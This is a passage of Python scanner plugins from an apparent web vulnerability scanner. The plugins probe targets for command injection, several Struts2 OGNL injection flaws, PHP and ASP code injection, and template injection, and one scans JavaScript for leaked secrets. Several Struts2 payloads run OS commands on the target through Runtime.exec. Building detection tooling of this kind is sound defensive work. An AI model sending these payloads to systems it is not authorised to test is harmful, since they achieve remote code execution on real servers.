        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers, dict
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body, bytes
        resp_str = self.response.get_body_str()  # response body, str (auto-decoded)
        resp_headers = self.response.get_headers()  # response headers, dict

        post_hint = self.requests.post_hint
        post_data = self.requests.post_data

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method == 'POST':

            if post_hint == POST_HINT.NORMAL:
                # NOTE(review): randint is only passed to .format() on a string
                # with no "{}" placeholder, so it has no effect on the probe.
                randint = random.randint(1000, 9000)
                # probe string -> regexes that match its output when executed.
                # NOTE(review): non-raw strings; "\s"/"\S" are invalid escapes
                # kept verbatim (compile-time warning only), while "\x3d"
                # decodes to "=", making each "\x3d" pattern a duplicate of the
                # "=" pattern before it.
                url_flag = {
                    "set|set&set": [
                        'Path=[\s\S]*?PWD=',
                        'Path=[\s\S]*?PATHEXT=',
                        'Path=[\s\S]*?SHELL=',
                        'Path\x3d[\s\S]*?PWD\x3d',
                        'Path\x3d[\s\S]*?PATHEXT\x3d',
                        'Path\x3d[\s\S]*?SHELL\x3d',
                        'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
                        'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
                        'Non-authoritative\sanswer:\s+Name:\s*',
                        'Server:\s*.*?\nAddress:\s*'
                    ],
                    # Expected output is base64("6162983\n") directly followed
                    # by the literal, which only appears if the backticks were
                    # evaluated.
                    "echo `echo 6162983|base64`6162983".format(randint): [
                        "NjE2Mjk4Mwo=6162983"
                    ]
                }
                for k, v in post_data.items():
                    if k.lower() in ignoreParams:
                        continue
                    # Copy per parameter so only one field is tampered with at a time.
                    data = copy.deepcopy(post_data)
                    for spli in ['', ';']:
                        for flag, re_list in url_flag.items():
                            # '' replaces the value outright; ';' appends the
                            # probe to the original value.
                            if spli == "":
                                data[k] = flag
                            else:
                                data[k] = v + spli + flag
                            r = requests.post(url, data=data, headers=headers)
                            html1 = r.text
                            for rule in re_list:
                                if re.search(rule, html1, re.I | re.S | re.M):
                                    out.success(url, self.name, payload="{}:{}".format(k, data[k]), method=method,
                                                data=str(data), raw=r.raw)
                                    # Only leaves the rule loop; remaining
                                    # probes for this field are still sent.
                                    break
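    def audit(self):
        """Struts2 S2-057 (namespace OGNL injection) probe for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is placed as a path
        segment between the first parent path of ``netloc`` (from
        ``get_parent_paths``) and the last path component of the request URL.
        A hit is either the result of the random ``${a-b}`` subtraction or the
        literal ``<Struts2-vuln-Check>`` marker, looked for in the response
        headers as well as the body (the result may be echoed into a redirect
        Location header, which is why redirects are not followed). The first
        hit is reported through ``out.success`` and the method returns.
        Returns None.

        Fix over the original: a missing comma after the second payload fused
        it with the third into one string, so neither the 2.3.20 nor the 2.3.34
        marker payload was ever sent on its own.

        Caveats: the upstream exploit (github.com/Ivan1ee/struts2-057-exp) ran
        ``whoami``; the payloads kept here only print a marker, no command is
        executed. The ``[email protected]`` fragments inside the payloads look
        like e-mail obfuscation applied by the page this listing was copied
        from, not valid OGNL -- restore the original ``@class@member`` tokens
        before use. The keyword ``playload`` (sic) matches the other Struts
        checks in this file but differs from ``payload`` used elsewhere;
        confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        netloc = self.requests.netloc

        a = random.randint(10000000, 20000000)
        b = random.randint(1000000, 2000000)
        markers = [str(a - b), '<Struts2-vuln-Check>']
        payloads = [
            '${{{}-{}}}/'.format(a, b),
            # 2.3.20 variant, reduced from the upstream RCE to a marker print
            r'%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3cStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3e%27%29%29.%28%23w.close%28%29%29%7D/',
            # 2.3.34 variant (clears the OGNL exclusion lists first), marker print only
            r'%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3cStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3e%27%29%29.%28%23w.close%28%29%29%7D/',
        ]

        parents = get_parent_paths(netloc)
        if not parents:
            return
        base = parents[0]
        suffix = url.split('/')[-1]

        for payload in payloads:
            resp = requests.get(base + payload + suffix,
                                headers=headers,
                                allow_redirects=False)
            header_text = str(resp.headers)
            for marker in markers:
                if marker in header_text or marker in resp.text:
                    out.success(url,
                                self.name,
                                playload=payload,
                                method="GET",
                                check=marker,
                                raw=resp.raw)
                    return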
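    def audit(self):
        """Scan a JavaScript response for leaked URLs, e-mail addresses,
        credential-like ``key: value`` pairs, IPv4 addresses, cloud-storage
        hosts, Chinese mobile numbers, domain names and DOM-XSS sources.

        Runs only when the request path ends in ``.js``. Every regex is applied
        to the decoded response body; each distinct match goes through
        ``out.set`` (de-duplication) and is reported with ``out.success``.
        Returns None.

        Fixes over the original:
        * a missing comma fused the phone-number and domain regexes into one
          pattern, so neither matched on its own;
        * ``re.findall`` on a pattern with capture groups returns the groups,
          so the URL regex yielded only its surrounding quote characters --
          ``finditer`` + ``group(0)`` reports the whole match;
        * the DOM-XSS patterns were non-raw strings with ``\\.`` (invalid
          escape warning); they are raw now;
        * an unused ``data = ...get_body_data().decode(...)`` line, which could
          raise on undecodable bodies, is gone.

        Caveat: the credential regex includes very generic keys (``api``,
        ``eid``, ``sid``, ``email``...), so expect noise; treat hits as leads,
        not findings.
        """
        url = self.build_url()
        resp_str = self.response.get_body_str()
        parsed = self.requests.urlparse

        if os.path.splitext(parsed.path)[1] != '.js':
            return

        patterns = [
            # URLs pointing at server-side resources
            r'(\b|\'|")(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do)(\b|\'|")',
            # e-mail addresses
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            # token / password style assignments, e.g. token = xxxx or "apikey" : "xxxx"
            r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|email|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|api_key|apikey|userid|user_id|user-id)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}"?',
            # IPv4 addresses
            r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
            # cloud storage / hosting endpoints
            r'[\w]+\.cloudfront\.net',
            r'[\w\-.]+\.appspot\.com',
            r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
            r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
            r'(storage\.cloud\.google\.com\/[\w\-.]+)',
            r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
            # Chinese mobile numbers
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            # domain names
            r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))',
            # DOM-XSS sources
            r'location\.hash',
            r'location\.href',
            r'location\.search',
        ]

        for pattern in patterns:
            found = {m.group(0) for m in re.finditer(pattern, resp_str, re.M | re.I)}
            for item in found:
                if out.set(item):
                    out.success(url, self.name, info=item)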
    def audit(self):
        """Struts2 ``method:`` prefix OGNL probe (S2-032 style) for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is POSTed as a
        form-encoded body to the request URL; the first marker found in the
        response body is reported through ``out.success`` and the method
        returns. Returns None.

        Markers: the result of a random subtraction (printed by payload 1,
        computed by ``expr`` in payload 3), the Windows ``print`` error text
        ("Unable to initialize device PRN" and its Chinese / mojibake forms)
        triggered by payload 2's ``print test``, and ``<Struts2-vuln-Check>``
        assembled by payload 4 from ``getRealPath(pp)`` + ``Check>``.

        Caveats: payloads 2 and 3 run an OS command (``print test`` / ``expr``)
        through ``Runtime.exec`` on the target -- this is a code-execution
        probe, not a passive check; payload 4 only echoes a path. The
        ``[email protected]`` fragments inside the payloads look like e-mail
        obfuscation applied by the page this listing was copied from, not valid
        OGNL -- restore the original ``@class@member`` tokens before use.
        NOTE(review): the ``Content-Type`` assignment writes into the dict
        returned by ``get_headers()``; confirm that is a copy and not the live
        request headers. The keyword ``playload`` (sic) is what the other
        Struts checks here use; confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()

        a = random.randint(10000000, 20000000)
        b = random.randint(1000000, 2000000)
        expr_cmd = "expr {} - {}".format(a, b)

        markers = [
            str(a - b), '无法初始化设备 PRN', '??????? PRN',
            '<Struts2-vuln-Check>', 'Unable to initialize device PRN'
        ]
        probes = [
            r"method%3a%23_memberAccess%[email protected]+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%[email protected]@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28"
            + str(a) + '-' + str(b) + "%29%2c%23kxlzx.close",
            r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=print+test&pp=\\A&ppp=%20&encoding=UTF-8",
            r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="
            + expr_cmd + r"&pp=\\A&ppp=%20&encoding=UTF-8",
            r"method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print('Check>'),1?%23xx:%23request.toString&pp=<Struts2-vuln-&encoding=UTF-8"
        ]

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for probe in probes:
            resp = requests.post(url, headers=headers, data=probe)
            body = resp.text
            hit = next((m for m in markers if m in body), None)
            if hit is None:
                continue
            out.success(url,
                        self.name,
                        playload=probe,
                        method="POST",
                        check=hit,
                        raw=resp.raw)
            return
    def audit(self):
        """PHP code-injection probe (``eval``-style sinks) for POST forms.

        A random integer N in [1, 256] is injected as ``print(md5(N))`` in six
        framings: bare, after ``;``, breaking out of a ``'`` or ``"`` string,
        and as ``${@print(md5(N))}`` (with and without a trailing backslash).
        The bare ``print(...)`` payload replaces the parameter value; every
        other framing is appended to the original value. A parameter is
        reported when the response contains md5(N) (computed locally with the
        module's ``md5`` helper) or a PHP ``Parse error: syntax error`` message,
        which also shows the value reached an evaluator. The first hit ends the
        loop for that parameter. Only POST requests with an ordinary form body
        (``POST_HINT.NORMAL``) are probed; ``ignoreParams`` keys are skipped.
        Returns None.
        """
        method = self.requests.command
        if method != 'POST':
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        post_hint = self.requests.post_hint
        post_data = self.requests.post_data

        parse_error = r'Parse error: syntax error,.*?\Sin\S'
        seed = random.randint(1, 256)
        expected_hash = md5(str(seed).encode())
        templates = [
            "print(md5({}));",
            ";print(md5({}));",
            "';print(md5({}));$a='",
            "\";print(md5({}));$a=\"",
            "${{@print(md5({}))}}",
            "${{@print(md5({}))}}\\"
        ]

        if post_hint != POST_HINT.NORMAL:
            return

        for key, value in post_data.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(post_data)
            for template in templates:
                injected = template.format(seed)
                # only the bare print(...) framing replaces the whole value
                data[key] = injected if template[0] == "p" else value + injected
                resp = requests.post(url, data=data, headers=headers)
                body = resp.text
                hashed = expected_hash in body
                if hashed or re.search(parse_error, body, re.I | re.S | re.M):
                    out.success(url, self.name, payload="{}:{}".format(key, data[key]), method=method,
                                data=str(data), raw=resp.raw)
                    break
    def audit(self):
        """Struts2 OGNL-in-form-value probe (``a=1${(...)}`` form) for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is POSTed as a
        form-encoded body to the request URL. Unlike the sibling Struts checks,
        a hit does not stop the scan: every payload that produces a marker is
        reported separately via ``out.success``. Returns None.

        Markers: the result of a random subtraction (computed by ``expr`` in
        payload 2), the Windows ``print`` error text ("Unable to initialize
        device PRN" and its Chinese / mojibake forms) triggered by payload 1's
        ``print test``, and ``<Struts2-vuln-Check>`` assembled by payload 3
        from ``getRealPath("<Struts2-vuln-")`` + ``Check>``.

        Caveats: payloads 1 and 2 run an OS command through ``Runtime.exec`` on
        the target -- a code-execution probe, not a passive check; payload 3
        only echoes a path. The ``[email protected]`` fragments look like e-mail
        obfuscation applied by the page this listing was copied from, not valid
        OGNL -- restore the original ``@class@member`` tokens before use.
        NOTE(review): the ``Content-Type`` assignment writes into the dict
        returned by ``get_headers()``; confirm that is a copy and not the live
        request headers. ``playload`` (sic) is the keyword the other Struts
        checks here use; confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()

        a = random.randint(10000000, 20000000)
        b = random.randint(1000000, 2000000)
        expr_cmd = "expr {} - {}".format(a, b)

        markers = [
            str(a - b), '无法初始化设备 PRN', '??????? PRN',
            '<Struts2-vuln-Check>', 'Unable to initialize device PRN'
        ]
        probes = [
            r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRuntime().exec('print test').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
            r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRuntime().exec("'''
            + expr_cmd +
            '''").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
            r'a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.print(%23req.getRealPath("<Struts2-vuln-")),%23k8out.println("Check>"),%23k8out.close())}'
        ]

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for probe in probes:
            resp = requests.post(url, headers=headers, data=probe)
            body = resp.text
            hit = next((m for m in markers if m in body), None)
            if hit is None:
                continue
            # report and keep going with the remaining probes
            out.success(url,
                        self.name,
                        playload=probe,
                        method="POST",
                        check=hit,
                        raw=resp.raw)
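    def audit(self):
        """Struts2 ``debug=browser&object=...`` DevMode OGNL probe for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is first POSTed as
        a form-encoded body to the request URL, then, if that produced nothing,
        sent as the query string of ``netloc``. The first response containing
        ``<Struts2-vuln-Check>`` is reported via ``out.success`` and the method
        returns. None of the payloads executes a command: they print a marker,
        either directly or as ``getRealPath(pp)`` + ``Check>``. Returns None.

        Fix over the original: the third payload sent ``pp=Struts2-vuln-``
        without the leading ``<``, so its output (``.../Struts2-vuln-Check>``)
        could never contain the ``<Struts2-vuln-Check>`` marker being checked;
        it now sends ``pp=<Struts2-vuln-`` like the first payload.

        Caveats: the ``[email protected]`` fragments inside the payloads look
        like e-mail obfuscation applied by the page this listing was copied
        from, not valid OGNL -- restore the original ``@class@member`` tokens
        before use. NOTE(review): the ``Content-Type`` assignment writes into
        the dict returned by ``get_headers()``; confirm that is a copy and not
        the live request headers. ``playload`` (sic) is the keyword the other
        Struts checks here use; confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        netloc = self.requests.netloc

        marker = '<Struts2-vuln-Check>'
        payloads = [
            r"debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().print(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D)))(#context[#parameters.rpsobj[0]].getWriter().print('Check>')):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=<Struts2-vuln-&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest",
            r"debug=browser&object=%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%2c%23res%[email protected]@getResponse%28%29%2c%23w%3d%23res.getWriter%28%29%2c%23w.print%28%27<Struts2-vuln%27%2b%27-Check>%27%29%29",
            # pp must carry the leading '<' so getRealPath(pp) + 'Check>' yields
            # the exact marker; the original sent 'pp=Struts2-vuln-'.
            r"debug=browser&object=(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print('Check>'))&pp=<Struts2-vuln-"
        ]

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for payload in payloads:
            # body first, then the same payload as a raw query string
            posted = requests.post(url, headers=headers, data=payload)
            if marker in posted.text:
                out.success(url,
                            self.name,
                            playload=payload,
                            method="POST",
                            check=marker,
                            raw=posted.raw)
                return
            fetched = requests.get(netloc + '?' + payload, headers=headers)
            if marker in fetched.text:
                out.success(url,
                            self.name,
                            playload=payload,
                            method="GET",
                            check=marker,
                            raw=fetched.raw)
                return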
    def audit(self):
        """Struts2 parameter-name OGNL probe (``('\\43_memberAccess...')(a)`` form)
        for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is POSTed as a
        form-encoded body to the request URL; the first marker found in the
        response body is reported via ``out.success`` and the method returns.
        Returns None.

        Markers: the result of a random subtraction (computed by ``expr`` in
        payload 2), the Windows ``print`` error text ("Unable to initialize
        device PRN" and its Chinese / mojibake forms) triggered by payload 1's
        ``print test``, and ``Struts2-vuln-Check`` printed in two halves by
        payload 3.

        Caveats: payloads 1 and 2 flip ``denyMethodExecution`` and
        ``allowStaticMethodAccess`` and run an OS command through
        ``Runtime.exec`` on the target -- a code-execution probe, not a passive
        check; payload 3 only prints a marker. The ``[email protected]``
        fragments look like e-mail obfuscation applied by the page this listing
        was copied from, not valid OGNL -- restore the original
        ``@class@member`` tokens before use. NOTE(review): the ``Content-Type``
        assignment writes into the dict returned by ``get_headers()``; confirm
        that is a copy and not the live request headers. ``playload`` (sic) is
        the keyword the other Struts checks here use; confirm ``out.success``
        accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        if self.requests.command != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()

        a = random.randint(10000000, 20000000)
        b = random.randint(1000000, 2000000)
        expr_cmd = "expr {} - {}".format(a, b)

        markers = [
            str(a - b), '无法初始化设备 PRN', '??????? PRN',
            'Struts2-vuln-Check', 'Unable to initialize device PRN'
        ]
        probes = [
            r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'print test\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
            r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'"
            + expr_cmd +
            r"\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
            r'''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))=&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))=&(i2)(('\43xman\[email protected]@getResponse()')(d))=&(i95)(('\43xman.getWriter().print("Struts2-")')(d))=&&(i96)(('\43xman.getWriter().print("vuln-Check")')(d))=&(i99)(('\43xman.getWriter().close()')(d))='''
        ]

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for probe in probes:
            resp = requests.post(url, headers=headers, data=probe)
            body = resp.text
            hit = next((m for m in markers if m in body), None)
            if hit is None:
                continue
            out.success(url,
                        self.name,
                        playload=probe,
                        method="POST",
                        check=hit,
                        raw=resp.raw)
            return
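    def audit(self):
        """Template / expression-language injection probe on GET query parameters.

        For every parameter not in ``ignoreParams`` two payloads are appended to
        the original value: ``<r>${A*B}<r>`` and ``<r>#{A*B}<r>``, where ``r``
        is a random 4-character string (``random_str``) and A, B are random
        ints in [100, 900]. The page is fetched with
        ``requests.get(netloc, params=data)``; when the response contains
        ``r`` + A*B + ``r`` (braces optionally still around the number) the
        parameter is reported via ``out.success``. Skipped when the request is
        not GET, has no query string, or its path extension is not in
        ``acceptedExt``. Every hit is reported; the loop does not stop early.
        Returns None.

        Fixes over the original: ``raw=r.raw`` was passed to ``str.format`` on
        the payload text instead of to ``out.success``, so the raw response was
        never attached to the finding; the random tag is ``re.escape``d inside
        the detection regex; the payloads are a list, so they are sent in a
        fixed order instead of set order.
        """
        method = self.requests.command
        headers = self.requests.get_headers()
        url = self.build_url()
        parsed = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET' or parsed.query == '':
            return
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        for key, value in params.items():
            if key.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)

            a = random.randint(100, 900)
            b = random.randint(100, 900)
            tag = random_str(4)
            payloads = [
                "{tag}${{{a}*{b}}}{tag}".format(tag=tag, a=a, b=b),
                "{tag}#{{{a}*{b}}}{tag}".format(tag=tag, a=a, b=b),
            ]
            # matches tagPRODtag, tag{PROD}tag, tag${PROD}tag, tag#{PROD}tag
            flag = "{tag}.?{{?{prod}}}?{tag}".format(tag=re.escape(tag), prod=a * b)

            for payload in payloads:
                data[key] = value + payload
                r = requests.get(netloc, params=data, headers=headers)
                if re.search(flag, r.text):
                    out.success(url,
                                self.name,
                                payload="{}:{}".format(key, data[key]),
                                raw=r.raw)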
    def audit(self):
        """Struts2 ``${...}.action`` path OGNL probe for GET requests.

        Runs only when the response language is unknown or JAVA and the request
        path's extension is in ``acceptedExt``. Each payload is appended to
        ``netloc`` and fetched with GET; the first marker found in the response
        body is reported via ``out.success`` (with the original request method)
        and the method returns. Returns None.

        Markers: the result of a random subtraction (computed by ``expr`` in
        payload 2) and the Windows ``print`` error text ("Unable to initialize
        device PRN" and its Chinese / mojibake forms) triggered by payload 1's
        ``print test``.

        Caveats: *both* payloads flip ``denyMethodExecution`` /
        ``allowStaticMethodAccess`` by reflection and run an OS command
        through ``Runtime.exec`` on the target -- there is no non-executing
        variant in this check, so it is a code-execution probe by design.
        NOTE(review): ``Content-Type`` is set on a GET without a body, which is
        harmless but pointless; the assignment writes into the dict returned
        by ``get_headers()`` -- confirm that is a copy and not the live request
        headers. ``playload`` (sic) is the keyword the other Struts checks here
        use; confirm ``out.success`` accepts it.
        """
        if self.response.language and self.response.language != "JAVA":
            return
        method = self.requests.command
        if method != 'GET':
            return
        parsed = self.requests.urlparse
        if os.path.splitext(parsed.path)[1] not in acceptedExt:
            return

        headers = self.requests.get_headers()
        url = self.build_url()
        netloc = self.requests.netloc

        a = random.randint(10000000, 20000000)
        b = random.randint(1000000, 2000000)
        expr_cmd = "expr {} - {}".format(a, b)

        markers = [
            str(a - b), '无法初始化设备 PRN', '??????? PRN',
            'Unable to initialize device PRN'
        ]
        probes = [
            r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('print test').getInputStream())%2C%23q%7D.action",
            r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('"
            + expr_cmd + "').getInputStream())%2C%23q%7D.action"
        ]

        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        for probe in probes:
            resp = requests.get(netloc + probe, headers=headers)
            body = resp.text
            hit = next((m for m in markers if m in body), None)
            if hit is None:
                continue
            out.success(url,
                        self.name,
                        playload=probe,
                        method=method,
                        check=hit,
                        raw=resp.raw)
            return
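    def audit(self):
        """ASP code-injection probe (``response.write``) on GET query parameters.

        Runs only when the response language is unknown or ASP, the request is
        GET with a non-empty query string, and the path extension is in
        ``acceptedExt``. Two random 5-digit ints A and B are multiplied inside
        ``response.write(A*B)``; a parameter is reported via ``out.success`` when
        the response body contains the product. Three framings are tried: the
        bare call (replaces the parameter value) and two string-breaking
        variants (appended to the original value). The first hit ends the loop
        for that parameter. Returns None.

        Fix over the original: the branch selecting replace-vs-append compared
        ``payload[0]`` (a single character) with ``""``, which is never true,
        so the bare ``response.write`` payload was always appended to the
        value. Mirroring the PHP check in this file, the bare payload now
        replaces the value and the quote-breaking variants append.

        NOTE(review): the third framing, ``"response.write(...)+"``, has no
        leading ``+`` -- it may be a typo for ``"+response.write(...)+"``, which
        would mirror the single-quote variant; left as found.
        """
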